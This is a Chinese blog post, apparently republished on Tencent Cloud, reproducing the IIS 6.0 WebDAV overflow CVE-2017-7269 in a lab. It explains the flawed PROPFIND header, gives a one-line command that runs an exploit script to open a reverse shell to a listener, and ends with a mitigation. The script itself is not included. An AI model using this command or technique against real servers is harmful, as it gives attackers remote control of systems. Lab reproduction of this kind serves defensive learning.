前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >IIS6.0 CVE-2017-7269 漏洞复现

IIS6.0 CVE-2017-7269 漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 17:39:16
1.9K0
发布2019-09-24 17:39:16
举报
文章被收录于专栏:安全漏洞环境学习

在目前很多的攻防比赛中,IIS6.0仍然会出现,因此,我们再次再来和大家一起学习一波此漏洞的利用。

0X0 概述

Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了。

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。该漏洞自2016年7、8月起就已被利用。

由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

0X1:环境搭建:

Winodws Server2003,IIS开启写功能

物理机IP:192.168.1.2

靶 机 IP:172.16.1.17

0x2 漏洞利用

本地开启监听端口:

运行脚本攻击:

python iis6.0.py 172.16.1.17 80 192.168.1.24444

查看反弹:

攻击完成后,靶机的web服务就无法正常访问了!不过这个时候就已经完全控制系统了!

0X3 漏洞修复

关闭读写功能,禁止用户通过此功能写入。

发送:“IIS6.0“关键字”获取实验学习验证代码文件。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-01-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档